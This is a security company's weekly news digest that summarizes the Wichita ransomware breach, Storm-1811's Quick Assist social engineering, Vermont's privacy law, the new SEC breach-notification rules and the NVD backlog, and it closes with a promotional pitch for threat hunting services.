Project Hyphae

Information Security News 5-20-2024

Share This Post

Wichita Cyber Attack: Social Security Numbers, Drivers Licenses, Payment Info Compromised

Article Link:

  • The City of Wichita, KS experienced a ransomware attack, compromising police and traffic records, leading to the unauthorized release of personal information such as Social Security numbers, names, driver’s licenses, and payment card details. The breach occurred between May 3 and 4, prompting the city to take its systems offline on May 5 due to the caution of malware spreading across its networks. Currently, the Wichita network remains offline.
  • LockBit claimed that they were responsible for the ransomware attack, threatening to release personal data on the dark web, though there has not been any confirmation that there was contact regarding ransom demands.
  • City operations were impacted, resulting in temporary measures such as offering free bus rides and pausing water shutoffs since the online payment system was hindered due to the attack.
  • Wichita residents are cautioned to monitor their personal information and watch for suspicious activity on their accounts via resources that are provided through the major credit bureaus.

Cybercriminals Exploiting Microsoft’s Quick Assist Feature in Ransomware Attacks

Article Link:

  • Microsoft observed the cybercriminal group Storm-1811 using the Quick Assist tool for social engineering attacks. Storm-1811, known for deploying Black Basta ransomware, adopts tactics of impersonating trusted entities to deceive victims.
  • The attack process involves vishing, installing remote monitoring tools, and delivering QakBot, Cobalt Strike, and Black Basta ransomware. Attackers will exploit Quick Assist by posing as tech support or internal IT to gain an initial foothold in devices.
  • Once access is granted via Quick Assist, attackers run commands to download malicious payloads and deploy ransomware across the network using PsExec.
  • Microsoft is working on adding warning messages to Quick Assist to alert users of potential scams.

Low-Tech Tactics Still Top the IT Security Risk Chart

Article Link:

  • Despite advancements in cybersecurity, low-tech attack methods such as USB-based attacks, QR code phishing, and social engineering remain effective and post significant threats. USB-based attacks, facilitated by social engineering tactics, have resurged, with attackers distributing fake company-branded drives and toys with built USB drives to infiltrate systems.
  • QR code exploitation is on the rise as well, targeting individuals who may not be wary of QR codes potential risks. Even common tasks like QR code authentication can be vulnerable to exploitation.
  • Cybercriminals are leveraging generative AI tools to enhance social engineering tactics, making attacks seem to be more persuasive and difficult to detect.
  • Human error continues to be a significant factor in cyber incidents, emphasizing the importance of ongoing awareness training and education.

Vermont Cracks Down on Personal Data Use with New Data Privacy Law

Article Link:

  • Vermont legislators passed an extensive data privacy law, dubbed the Vermont Data Privacy Act, which is considered one of the strongest in the U.S.
  • The law empowers individuals to sue companies for privacy violations and imposes significant restrictions on data collection and usage, particularly banning the sale of sensitive personal information like driver’s license numbers, health records, and financial data.
  • The law’s passage is expected to impact how major tech companies like Facebook, Google, and Amazon handle consumer data and address data breaches. It may also prompt other states to enforce similar legislation, extending protections to consumers nationwide and potentially leading to class-action lawsuits against tech companies.
  • Link to Additional Information:
  • Link to Full Text (House Bill 121):

A SaaS Security Challenge: Getting Permissions All in One Place

Article Link:

  • SaaS platforms such as Microsoft 365, Salesforce, and Workday offer precise permissions, which dictates user access based on roles, tasks, projects, and customized permissions. Managing all these permissions can come to be complex for administrators due to lack of a unified source for review and management.
  • CISO’s and admins face significant challenges due to complexity of permissions, requiring a solution that can provide a full visibility into user permissions to effectively enforce company policies.
  • A centralized permissions inventory is crucial for a strong SaaS security strategy, as it helps reduce the attack surface, identify unnecessary user permissions, manage non-human access, and detect privilege abuse.
  • Implementing SaaS security through a permissions inventory is essential for any organization that is adopting SaaS solutions, with future tools expected to offer a cohesive dashboard for efficient permissions management.

SEC to Require Financial Firms to have Data Breach Incident Plans

Article Link:

  • The SEC has recently introduced new regulations mandating specific financial institutions, which included broker-dealers, funding portals, investment companies, registered investment advisers, and transfer agents, to establish a comprehensive plan to manage data breaches that involves customer data.
  • The listed institutions are required to develop and uphold written protocols for identifying and responding to data breaches. There must be informed communication to affected customers promptly, providing them with detailed information about the breach and the data that was compromised.
  • Notifications to impacted customers must occur within a short window, which is 30 days of the institution’s identification of the data breach.
  • This initiative by the SEC highlights the importance of proactive monitoring and reporting in strengthening cybersecurity and protecting consumer interests.
  • Link to the SEC’s New Rules:
  • Link to the SEC’s Announcement:

The Fall of the National Vulnerability Database

Article Link:

  • The National Vulnerability Database (NVD) overseen by NIST hasn’t been updated since Feb 12, raising concerns about its effectiveness.
  • There are three key factors which has impacted NVD’s ability to classify security concerns effectively include: Large number of inexperienced researchers seeking recognition has led to a decline in report quality, global accessibility has increased contributions but also introduced low-quality reports and exploitation on the Dark Web, and bug bounty programs have encouraged quantity over quality, flooding vendors with reports, with many being irrelevant or false positives.
  • Vendors are now struggling to sort through the considerable number of low-quality reports, causing attention to be diverted from meaningful research and undermining vulnerability management efforts.
  • The CVE program introduced Central Naming Authorities (CNA) to manage the increased load, but the NVD’s manual processes led to scalability issues and a half on enriched vulnerabilities.

Reach out to our incident response team for help

More To Explore

CVE-2024-3596 | Attackers Blasting RADIUS

CVE-2024-3596 | CVSS:9.0 A new and emerging attacked named “Blast-RADIUS”, allows a man-in-the-middle attack between the RADIUS client and server to forge a valid protocol

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.